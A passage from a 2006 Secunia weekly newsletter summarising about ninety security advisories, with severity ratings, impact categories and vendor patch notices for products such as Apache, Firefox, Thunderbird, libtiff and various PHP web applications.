========================================================================
The Secunia Weekly Advisory Summary
2006-07-27 - 2006-08-03
This week: 90 advisories
========================================================================
Table of Contents:
1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Weeks Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing
========================================================================
1) Word From Secunia:
Secunia Survey Feedback
Secunia would like to inform you that the Secunia Survey has been
brought to an end and that the winners of our prize draw have been
found. The winners are living in California and the United Kingdom,
both have received their iPod nano's.
The overall survey feedback was positive and the results showed a
confidence in Secunia's ability to keep you well-informed with highly
reliable information. We are very grateful for that.
Though there tend to be a lack of knowledge about our commercial
solutions, in the sense that 60% of the respondents valued filtered
and real time advisories - a solution Secunia already provides
businesses today:
The Secunia Security Manager Product:
http://secunia.com/security_manager/menu=prod
Request An Account:
https://ca.secunia.com/?page=requestaccount&f=ssum
Again we would like to thank you all for participating.
Best regards,
Niels Henrik Rasmussen
CEO Secunia
========================================================================
2) This Week in Brief:
Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.
Please refer to the referenced Secunia advisory for a comprehensive
listing of the issues corrected with this update.
Reference:
http://secunia.com/SA21253
--
A vulnerability has been discovered in Safari, which potentially can be
exploited by malicious people to compromise a user's system.
Currently, no vendor solution is available. See the referenced Secunia
advisory for an alternative workaround.
Reference:
http://secunia.com/SA21271
--
A vulnerability has been reported in various McAfee products, which
can be exploited by malicious people to compromise a vulnerable system.
Successful exploitation allows execution of arbitrary code when a user
visits a malicious web site.
Reference:
http://secunia.com/SA21264
--
A vulnerability has been reported in Apache HTTP Server, which
potentially can be exploited by malicious people to compromise a
vulnerable system.
The vulnerability is caused by a off-by-one error in mod_rewrite within
the ldap scheme handling and can be exploited to cause a one-byte
buffer overflow.
The vendor has released an updated version that fixes this
vulnerability.
Reference:
http://secunia.com/SA21197
--
VIRUS ALERTS:
During the past week Secunia collected 142 virus descriptions from the
Antivirus vendors. However, none were deemed MEDIUM risk or higher
according to the Secunia assessment scale.
========================================================================
3) This Weeks Top Ten Most Read Advisories:
1. [SA19873] Mozilla Firefox Multiple Vulnerabilities
2. [SA21197] Apache mod_rewrite Off-By-One Buffer Overflow
Vulnerability
3. [SA21228] Mozilla Thunderbird Multiple Vulnerabilities
4. [SA21172] Apache "Expect" Header Cross-Site Scripting Vulnerability
5. [SA20153] Microsoft Word Malformed Object Pointer Vulnerability
6. [SA20748] Microsoft Windows Hyperlink Object Library Buffer
Overflow
7. [SA21264] McAfee SecurityCenter Unspecified Code Execution
Vulnerability
8. [SA21276] Microsoft Windows Server Driver Denial of Service
Vulnerability
9. [SA21200] Check Point VPN/Firewall Directory Traversal
Vulnerability
10. [SA21251] Sun Java System Application Server / Web Server File
Disclosure
========================================================================
4) Vulnerabilities Summary Listing
Windows:
[SA21264] McAfee SecurityCenter Unspecified Code Execution
Vulnerability
[SA21256] Lhaplus "extended header size" Buffer Overflow
[SA21276] Microsoft Windows Server Driver Denial of Service
Vulnerability
[SA21280] Symantec On-Demand Agent Weak Encryption
UNIX/Linux:
[SA21324] Debian update for mozilla-thunderbird
[SA21275] Ubuntu update for thunderbird
[SA21271] Safari "KHTMLParser::popOneBlock()" Memory Corruption
[SA21270] Red Hat update for firefox
[SA21269] Red Hat update for thunderbird
[SA21262] SGI Advanced Linux Environment Multiple Updates
[SA21261] Mandriva update for libwmf
[SA21253] Mac OS X Security Update Fixes Multiple Vulnerabilities
[SA21250] rPath update for thunderbird
[SA21249] Debian update for ethereal
[SA21246] Red Hat update for seamonkey
[SA21243] Ubuntu update for firefox
[SA21338] Ubuntu update for tiff
[SA21334] Debian update for tiff
[SA21329] rPath update for gnupg
[SA21323] Debian update for libtunepimp
[SA21319] SUSE update for libtiff
[SA21315] Gentoo update for apache
[SA21313] Debian update for apache
[SA21307] OpenBSD update for httpd
[SA21300] Red Hat update for gnupg
[SA21295] Gentoo update for audacious
[SA21290] Red Hat update for libtiff
[SA21285] SUSE update for freetype2
[SA21284] Debian update for apache2
[SA21278] Gentoo update for OpenOffice.org
[SA21277] Gentoo tunepimp Release Date Lookup Buffer Overflow
[SA21274] rPath update for libtiff
[SA21273] Mandriva update for apache
[SA21266] Slackware update for apache
[SA21254] Mandriva update for freeciv
[SA21252] Red Hat Stronghold updates for uw-imap and PHP
[SA21247] rPath update for httpd and mod_ssl
[SA21245] SUSE update for apache
[SA21244] Debian update for drupal
[SA21241] Ubuntu update for apache
[SA21238] Audacious AdPlug Multiple Buffer Overflow Vulnerabilities
[SA21232] Ubuntu update for freetype
[SA21265] Debian update for osiris
[SA21272] Mandriva update for ruby
[SA21248] Debian update for sitebar
[SA21236] Red Hat update for ruby
[SA21233] Ubuntu update for ruby
[SA21240] Debian update for heartbeat
[SA21231] Ubuntu update for heartbeat
Other:
[SA21279] Sun Fire T2000 Incorrect DSA Signature Verification
[SA21258] Barracuda Spam Firewall Information Disclosure and Default
Account
Cross Platform:
[SA21314] Knusperleicht NewsLetter "NL_PATH" File Inclusion
[SA21312] Knusperleicht newsReporter "news_include_path" File
Inclusion
[SA21305] Joomla UHP Component File Inclusion Vulnerabilities
[SA21302] Knusperleicht Shoutbox "sb_include_path" File Inclusion
[SA21294] Knusperleicht FileManager "dwl_include_path" File Inclusion
[SA21292] Mambo Mambatstaff Component File Inclusion Vulnerability
[SA21291] TSEP "tsep_config[absPath]" File Inclusion Vulnerability
[SA21289] Easy File Sharing FTP Server "PASS" Buffer Overflow
[SA21288] Joomla Colophon Component File Inclusion Vulnerability
[SA21268] Mambo MGM Component File Inclusion Vulnerability
[SA21263] MyNewsGroups :) "myng_root" File Inclusion Vulnerability
[SA21260] Joomla Security Images Component File Inclusion
[SA21234] WMNews "data_basepath" File Inclusion Vulnerability
[SA21229] Mozilla SeaMonkey Multiple Vulnerabilities
[SA21228] Mozilla Thunderbird Multiple Vulnerabilities
[SA21340] Geodesic Solutions Products "b" Parameter SQL Injection
[SA21325] GeoAuctions Enterprise "d" Parameter SQL Injection
[SA21309] WordPress Unspecified Vulnerabilities
[SA21308] ATutor SQL Injection Vulnerabilities
[SA21304] libTIFF Multiple Vulnerabilities
[SA21303] BomberClone Multiple Vulnerabilities
[SA21297] GnuPG "parse_comment" Denial of Service Vulnerability
[SA21293] XMB "u2uid" SQL Injection Vulnerability
[SA21287] vbPortal "bbvbplang" Local File Inclusion Vulnerability
[SA21286] Ajax Chat Cross-Site Scripting and Information Disclosure
[SA21283] xpoll "poll" Parameter SQL Injection Vulnerability
[SA21282] X-Protection protect.php SQL Injection Vulnerabilities
[SA21281] X-Statistics "User-Agent" HTTP Header SQL Injection
[SA21267] Open Cubic Player Multiple Buffer Overflows
[SA21251] Sun Java System Application Server / Web Server File
Disclosure
[SA21301] Informix Dynamic Server Multiple Vulnerabilities
[SA21257] Osiris Format String Vulnerabilities
[SA21296] AWBS Cross-Site Scripting Vulnerabilities
[SA21242] Taskjitsu Cross-Site Scripting and Script Insertion
Vulnerabilities
[SA21239] Dokeos Unspecified Cross-Site Scripting Vulnerabilities
[SA21237] GeoClassifieds Enterprise Cross-Site Scripting
Vulnerabilities
[SA21235] TWiki "TYPEOF" Arbitrary Command Execution Vulnerability
[SA21230] VMware ESX Server Multiple Vulnerabilities
[SA21259] MySQL MERGE Table Privilege Revoke Bypass
========================================================================
5) Vulnerabilities Content Listing
Windows:--
[SA21264] McAfee SecurityCenter Unspecified Code Execution
Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-08-01
eEye Digital Security has reported a vulnerability in various McAfee
products, which can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21264/
--
[SA21256] Lhaplus "extended header size" Buffer Overflow
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-08-01
Tan Chew Keong has reported a vulnerability in Lhaplus, which can be
exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21256/
--
[SA21276] Microsoft Windows Server Driver Denial of Service
Vulnerability
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2006-07-31
ISS X-Force has discovered a vulnerability in Microsoft Windows, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
Full Advisory:
http://secunia.com/advisories/21276/
--
[SA21280] Symantec On-Demand Agent Weak Encryption
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2006-08-02
A security issue has been reported in Symantec On-Demand Agent, which
can be exploited by malicious, local users to disclose potentially
sensitive information.
Full Advisory:
http://secunia.com/advisories/21280/
UNIX/Linux:--
[SA21324] Debian update for mozilla-thunderbird
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, System access
Released: 2006-08-02
Debian has issued an update for mozilla-thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions, conduct cross-site scripting and HTTP
response smuggling attacks, and potentially compromise a user's
system.
Full Advisory:
http://secunia.com/advisories/21324/
--
[SA21275] Ubuntu update for thunderbird
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2006-07-31
Ubuntu has issued an update for thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks and compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21275/
--
[SA21271] Safari "KHTMLParser::popOneBlock()" Memory Corruption
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
A vulnerability has been discovered in Safari, which potentially can be
exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21271/
--
[SA21270] Red Hat update for firefox
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, DoS, System access
Released: 2006-07-31
Red Hat has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions, conduct cross-site scripting and HTTP
response smuggling attacks, and potentially compromise a user's
system.
Full Advisory:
http://secunia.com/advisories/21270/
--
[SA21269] Red Hat update for thunderbird
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, DoS, System access
Released: 2006-07-31
Red Hat has issued an update for thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions, conduct cross-site scripting and HTTP
response smuggling attacks, and potentially compromise a user's
system.
Full Advisory:
http://secunia.com/advisories/21269/
--
[SA21262] SGI Advanced Linux Environment Multiple Updates
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Exposure of
sensitive information, Privilege escalation, DoS, System access
Released: 2006-08-01
SGI has issued a patch for SGI Advanced Linux Environment. This fixes
some vulnerabilities, which can be exploited by malicious, local users
to gain escalated privileges, perform certain actions with escalated
privileges, by malicious users to access the system from IPs that they
where not supposed to, and by malicious people to conduct cross-site
scripting attacks, disclose certain sensitive information, cause a DoS
(Denial of Service), or compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21262/
--
[SA21261] Mandriva update for libwmf
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
Mandriva has issued an update for libwmf. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise an
application using the vulnerable library.
Full Advisory:
http://secunia.com/advisories/21261/
--
[SA21253] Mac OS X Security Update Fixes Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Exposure of system
information, Exposure of sensitive information, Privilege escalation,
DoS, System access
Released: 2006-08-02
Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.
Full Advisory:
http://secunia.com/advisories/21253/
--
[SA21250] rPath update for thunderbird
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2006-07-28
rPath has issued an update for thunderbird. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks and compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21250/
--
[SA21249] Debian update for ethereal
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-28
Debian has issued an update for ethereal. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21249/
--
[SA21246] Red Hat update for seamonkey
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2006-07-28
Red Hat has issued an update for seamonkey. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks and compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21246/
--
[SA21243] Ubuntu update for firefox
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2006-07-28
Ubuntu has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting attacks or compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21243/
--
[SA21338] Ubuntu update for tiff
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-03
Ubuntu has issued an update for tiff. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) or potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21338/
--
[SA21334] Debian update for tiff
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-03
Debian has issued an update for tiff. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) or potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21334/
--
[SA21329] rPath update for gnupg
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2006-08-03
rPath has issued an update for gnupg. This fixes a vulnerability, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
Full Advisory:
http://secunia.com/advisories/21329/
--
[SA21323] Debian update for libtunepimp
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-08-02
Debian has issued an update for libtunepimp. This fixes a
vulnerability, which potentially can be exploited by malicious people
to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21323/
--
[SA21319] SUSE update for libtiff
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
SUSE has issued an update for libtiff. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) or potentially compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21319/
--
[SA21315] Gentoo update for apache
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
Gentoo has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21315/
--
[SA21313] Debian update for apache
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
Debian has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21313/
--
[SA21307] OpenBSD update for httpd
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
OpenBSD has issued an update for httpd. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21307/
--
[SA21300] Red Hat update for gnupg
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2006-08-02
Red Hat has issued an update for gnupg. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service).
Full Advisory:
http://secunia.com/advisories/21300/
--
[SA21295] Gentoo update for audacious
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
Gentoo has issued an update for audacious. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21295/
--
[SA21290] Red Hat update for libtiff
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
Red Hat has issued an update for libtiff. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or potentially compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21290/
--
[SA21285] SUSE update for freetype2
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
SUSE has issued an update for freetype2. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise applications using the library.
Full Advisory:
http://secunia.com/advisories/21285/
--
[SA21284] Debian update for apache2
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
Debian has issued an update for apache2. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21284/
--
[SA21278] Gentoo update for OpenOffice.org
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-07-31
Gentoo has issued an update for OpenOffice.org. This fixes some
vulnerabilities, which can be exploited by malicious people to
compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21278/
--
[SA21277] Gentoo tunepimp Release Date Lookup Buffer Overflow
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-08-01
Gentoo has acknowledged a vulnerability in tunepimp, which potentially
can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21277/
--
[SA21274] rPath update for libtiff
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
rPath has issued an update for libtiff. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21274/
--
[SA21273] Mandriva update for apache
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
Mandriva has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21273/
--
[SA21266] Slackware update for apache
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
Slackware has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21266/
--
[SA21254] Mandriva update for freeciv
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2006-08-01
Mandriva has issued an update for freeciv. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/21254/
--
[SA21252] Red Hat Stronghold updates for uw-imap and PHP
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, System access
Released: 2006-07-28
Red Hat has issued updates for uw-imap and PHP. These fix some
vulnerabilities, which can be exploited by malicious, local users to
bypass certain security restrictions, or malicious people to bypass
certain security restrictions, conduct cross-site scripting attacks, or
compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21252/
--
[SA21247] rPath update for httpd and mod_ssl
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
rPath has issued updates for httpd and mod_ssl. These fix a
vulnerability, which potentially can be exploited by malicious people
to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21247/
--
[SA21245] SUSE update for apache
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
SUSE has issued an update for apache. This fixes a vulnerability, which
potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21245/
--
[SA21244] Debian update for drupal
Critical: Moderately critical
Where: From remote
Impact: System access, Manipulation of data, Cross Site Scripting
Released: 2006-07-28
Debian has issued an update for drupal. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and SQL injection attacks, and by malicious users
to potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21244/
--
[SA21241] Ubuntu update for apache
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-28
Ubuntu has issued an update for apache. This fixes a vulnerability,
which potentially can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21241/
--
[SA21238] Audacious AdPlug Multiple Buffer Overflow Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-31
Some vulnerabilities have been reported in Audacious, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21238/
--
[SA21232] Ubuntu update for freetype
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-07-28
Ubuntu has issued an update for freetype. This fixes a vulnerability,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise applications using the library.
Full Advisory:
http://secunia.com/advisories/21232/
--
[SA21265] Debian update for osiris
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2006-08-01
Debian has issued an update for osiris. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21265/
--
[SA21272] Mandriva update for ruby
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2006-07-31
Mandriva has issued an update for ruby. This fixes some
vulnerabilities, which can be exploited by malicious people to bypass
certain security restrictions.
Full Advisory:
http://secunia.com/advisories/21272/
--
[SA21248] Debian update for sitebar
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-08-02
Debian has issued an update for sitebar. This fixes a vulnerability,
which can be exploited by malicious people to conduct cross-site
scripting attacks.
Full Advisory:
http://secunia.com/advisories/21248/
--
[SA21236] Red Hat update for ruby
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2006-07-28
Red Hat has issued an update for Ruby. This fixes some vulnerabilities,
which can be exploited by malicious people to bypass certain security
restrictions.
Full Advisory:
http://secunia.com/advisories/21236/
--
[SA21233] Ubuntu update for ruby
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2006-07-28
Ubuntu has issued an update for ruby. This fixes some vulnerabilities,
which can be exploited by malicious people to bypass certain security
restrictions.
Full Advisory:
http://secunia.com/advisories/21233/
--
[SA21240] Debian update for heartbeat
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2006-07-28
Debian has issued an update for heartbeat. This fixes a vulnerability,
which can be exploited by malicious, local users to cause a DoS (Denial
of Service).
Full Advisory:
http://secunia.com/advisories/21240/
--
[SA21231] Ubuntu update for heartbeat
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2006-07-28
Ubuntu has issued an update for heartbeat. This fixes a vulnerability,
which can be exploited by malicious, local users to cause a DoS (Denial
of Service).
Full Advisory:
http://secunia.com/advisories/21231/
Other:--
[SA21279] Sun Fire T2000 Incorrect DSA Signature Verification
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2006-08-02
A security issue has been reported in Sun Fire T2000, which potentially
can be exploited by malicious people to bypass certain security
restrictions.
Full Advisory:
http://secunia.com/advisories/21279/
--
[SA21258] Barracuda Spam Firewall Information Disclosure and Default
Account
Critical: Less critical
Where: From local network
Impact: Security Bypass, Exposure of system information, Exposure
of sensitive information
Released: 2006-08-02
Greg Sinclair has reported a vulnerability and a security issue in
Barracuda Spam Firewall, which can be exploited by malicious people to
bypass certain security restrictions and disclose various information.
Full Advisory:
http://secunia.com/advisories/21258/
Cross Platform:--
[SA21314] Knusperleicht NewsLetter "NL_PATH" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-08-02
SHiKaA has discovered a vulnerability in Knusperleicht NewsLetter,
which can be exploited by malicious people to compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/21314/
--
[SA21312] Knusperleicht newsReporter "news_include_path" File
Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-08-02
Kurdish Security has discovered a vulnerability in Knusperleicht
newsReporter, which can be exploited by malicious people to compromise
a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21312/
--
[SA21305] Joomla UHP Component File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-07-31
Kurdish Security has discovered some vulnerabilities in the UHP
component for Mambo, which can be exploited by malicious people to
compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21305/
--
[SA21302] Knusperleicht Shoutbox "sb_include_path" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-08-02
Kurdish Security has discovered a vulnerability in Knusperleicht
Shoutbox, which can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21302/
--
[SA21294] Knusperleicht FileManager "dwl_include_path" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-08-02
SHiKaA has discovered a vulnerability in Knusperleicht FileManager,
which can be exploited by malicious people to compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/21294/
--
[SA21292] Mambo Mambatstaff Component File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-07-31
Dr.Jr7 has discovered a vulnerability in the Mambatstaff component for
Mambo, which can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21292/
--
[SA21291] TSEP "tsep_config[absPath]" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-08-02
Philipp Niedziela has discovered a vulnerability in TSEP, which can be
exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21291/
--
[SA21289] Easy File Sharing FTP Server "PASS" Buffer Overflow
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-07-31
h07 has discovered a vulnerability in Easy File Sharing FTP Server,
which can be exploited by malicious people to compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/21289/
--
[SA21288] Joomla Colophon Component File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-07-31
Drago84 has discovered a vulnerability in the Colophon component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21288/
--
[SA21268] Mambo MGM Component File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-07-31
A-S-T TEAM has discovered a vulnerability in the MGM component for
Mambo, which can be exploited by malicious people to compromise a
vulnerable system.
Full Advisory:
http://secunia.com/advisories/21268/
--
[SA21263] MyNewsGroups :) "myng_root" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-08-01
Philipp Niedziela has discovered a vulnerability in MyNewsGroups :),
which can be exploited by malicious people to compromise a vulnerable
system.
Full Advisory:
http://secunia.com/advisories/21263/
--
[SA21260] Joomla Security Images Component File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-07-31
Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21260/
--
[SA21234] WMNews "data_basepath" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-07-27
uNfz has reported a vulnerability in WMNews, which can be exploited by
malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21234/
--
[SA21229] Mozilla SeaMonkey Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2006-07-27
Multiple vulnerabilities have been reported in Mozilla SeaMonkey, which
can be exploited by malicious people to conduct cross-site scripting
attacks and compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21229/
--
[SA21228] Mozilla Thunderbird Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, DoS, System access
Released: 2006-07-27
Multiple vulnerabilities have been reported in Mozilla Thunderbird,
which can be exploited by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
Full Advisory:
http://secunia.com/advisories/21228/
--
[SA21340] Geodesic Solutions Products "b" Parameter SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-08-03
LBDT has reported a vulnerability in GeoClassifieds Basic and
GeoAuctions Premier, which can be exploited by malicious people to
conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/21340/
--
[SA21325] GeoAuctions Enterprise "d" Parameter SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-08-03
LBDT has reported a vulnerability in GeoAuctions Enterprise, which can
be exploited by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/21325/
--
[SA21309] WordPress Unspecified Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2006-07-31
Some vulnerabilities with unknown impacts have been reported in
WordPress.
Full Advisory:
http://secunia.com/advisories/21309/
--
[SA21308] ATutor SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-08-01
rgod has reported two vulnerabilities in ATutor, which can be exploited
by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/21308/
--
[SA21304] libTIFF Multiple Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-08-02
Some vulnerabilities have been reported in libTIFF, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21304/
--
[SA21303] BomberClone Multiple Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, DoS
Released: 2006-07-31
Luigi Auriemma has reported some vulnerabilities in BomberClone, which
can be exploited by malicious people to gain knowledge of system
information or cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/21303/
--
[SA21297] GnuPG "parse_comment" Denial of Service Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2006-08-02
Evgeny Legerov has reported a vulnerability in GnuPG, which can be
exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/21297/
--
[SA21293] XMB "u2uid" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-08-02
rgod has discovered a vulnerability in XMB, which can be exploited by
malicious users to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/21293/
--
